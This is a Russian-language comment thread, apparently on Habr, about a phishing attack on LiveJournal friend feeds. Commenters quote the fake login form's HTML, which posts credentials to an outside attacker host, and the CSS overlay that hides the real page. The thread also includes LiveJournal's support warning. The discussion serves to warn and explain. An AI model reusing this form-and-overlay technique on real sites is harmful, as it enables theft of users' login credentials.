Pull to refresh

Comments 26

Где скриншоты, интриги, расследования?
<form name="login" method="post" action="http://ohtoenequ1.getenjoyment.net/index.php">

Ну или последующий по тексту вариант с дивом:

<div class="appwidget appwidget-login"><form action="http://ohtoenequ1.getenjoyment.net/index.php" method="post" class="lj_login_form pkg">

Остальное — обвязка. Спрашивается, почему не вырезаются активные элементы и почему разрешено переопределять стили? Качественный фишинг, если не смотреть в код.
Обвязка — самое интересное. Как такое можно в постинг пускать в голове не укладывается, элементарные ведь вещи.
— style=«top: 0px; left: 0px; width: 100%; height: 100%; background-color: #fff; text-align: center; z-index: 99999; opacity: 1;»
— И не в первый раз такое, сколько было говна и черных властелинов. Оставил для истории код gist.github.com/1615426
Да вроде ничего криминального, если бы не зачем-то подключаемый стиль для b-fader.
Кстати, уже заблокировали, досадно.
Любопытно, что в голове у особей, которые опускают пост, призванный предупредить об опасности.
Понятно. Не думал, что тут до сих пор сидят обозленные на меня лузерки, которые будут всеми своими виртуальчиками опускать любые мои посты :)
Думаю, дело в том, что из поста совершенно не понятно, в чем же фишинг и почему фишинг. Если бы вы написали в посте код выдаваемой страницы и объяснили, что движок Livejournal содержит (?) уязвимость, позволяющую переопределять стили страницы и т.п. — это было бы намного более содержательным.

А так первая реакция до прочтения комментариев, что вы какую-то ерунды написали, не говоря уже о том, что, скорее всего, часть хабраюзеров негативно относится к ЖЖ.
В посте изложена самая суть: факт фишинга и место его применения. Это же не пост про анализ кода, это оперативное оповещение.
Ага, а теперь встаньте на место тех, кто это читает: что я должен думать, что автор идиот и никакой ошибки нет, или что действительно есть угроза безопасности?

Вы же никаких подтверждений не приводите, просто истеричное «будьте осторожны» и неуверенное «похоже на фишинг», что воспринимается как «у меня паранойя и я, на всякий случай, не стал нажимать — и вы не нажимайте».
«Истеричное» — бугага. Самый дешевый способ повысить собственную самооценку — это написать в адрес другого человека слово «истеричный».
Вот видите: вместо того, что бы исправить пост, вставив в него детали, вы нападаете в комментариях на невидимых пользователей, голосующих против поста, и меня тут в чем-то обвиняете.
Понимаете, я наивно предполагал, что:

1. Здесь остались еще достаточно взрослые люди, умеющие отличать главное от второстепенного. Главное — это факт атаки, ее локализация и внешние проявления. А вот примеры кода и т.п. — это второ- и третьестепенные вещи.

Цель поста — не поделиться навыками фишинга, а предупредить пользователей, многие из которых читают «Хабр» и, несмотря даже на многолетний опыт использования интернета, попадаются.

2. Как Вы пришли к заблуждению, будто бы я кого-то в чем-то обвинял? Или это не заблуждение, а намеренное искажение ситуации?
Извините, но я позволю себе проигнорировать ваши пассажи о взрослости, как неуместные.

В остальном мне кажется, что вы почему-то «наивно» решили, что
1. Ваше видение главного и второстепенного должно совпадать с видением других людей — и что раз уж есть хабр, на котором много людей, то для них будет полезным написать краткую заметку о возможном факте атаки.

Но жизнь, о ужас, сложнее — и мало написать, что где-то что-то в какой-то там жежешечьке вам показалось. Факты, факты, доказательства! Разбор полетов! Именно этого ждет хабраюзер, представляется мне. А молнии — это на ленту.ру, пожалуйста.

2. По-моему, ваши комментарии habrahabr.ru/blogs/infosecurity/136256/#comment_4531873 и habrahabr.ru/blogs/infosecurity/136256/#comment_4531931 об этом красноречиво говорят. Но, вполне возможно, что просто напросто мы с вами по-разному думаем и воспринимаем действительность, поэтому вам они кажутся вполне нормальными.
Да, мы действительно думаем по-разному, потому как повышать самооценку за счет использования в отношении других людей слова «истерика» я лично перестал лет пять тому назад. Примерно в Вашем возрасте.
А как можно переопределить стили для всех? Произошла замена части кода ЖЖ или дело в чем-то другом?
См. комментарий выше — стилизованная форма + блок, перекрывающий остальной контент за счет правил в стилях.
UFO just landed and posted this here
Вы теперь во всех постах это писать будете?)
Говорят, что если написать этот текст в 666 постах, то на хабр снизойдет кара.
Как показала практика и при меньшем числе постов кара снизошла, но на постившего)
10 минут назад тоже столкнулся.
Свой журнал смотрится нормально, главная страница нормально, а френд-лента — просит пароль.
Смутила сама форма ввода пароля — какая-то неказистая, не вписывающаяся в дизайн.
Паранойя пароль ввести на дала.
юзернейм.livejournal.com/friends/?nohtml=1 поможет избежать показа HTML в ленте

А вот и сам ЖЖ отписался:

www.livejournal.com/support/?uselang=ru

В настоящее время в LiveJournal замечены попытки массового фишинга, в связи с чем призываем вас быть как можно осторожнее. Выглядит ложное окно авторизации так, а оригинальное отличается и выглядит иначе.

Если при открытии своей ленты друзей вы видите окно, очень похожее на страницу авторизации в LiveJournal с предложением ввести своё имя пользователя и пароль, не вводите свои данные в это окно, в противном случае данные вашего аккаунта могут стать известны злоумышленникам.

Если вы уже вводили свои данные в этом окне авторизации, незамедлительно смените пароль для своего аккаунта на этой странице и ознакомьтесь со всеми возможными мерами, как обезопасить свой аккаунт, в этом разделе Справки. О том, что делать, если взлом аккаунта произошёл, говорится в другом разделе Справки, с которым можно ознакомиться здесь.

Наши специалисты уведомлены об этой ситуации и предпринимают все необходимые меры для её скорейшего предотвращения. Пожалуйста, примите извинения за возможные неудобства.
Напрягло. Обычный фишинг виден за километр, а тут очень суровая маскировка…
Sign up to leave a comment.

Articles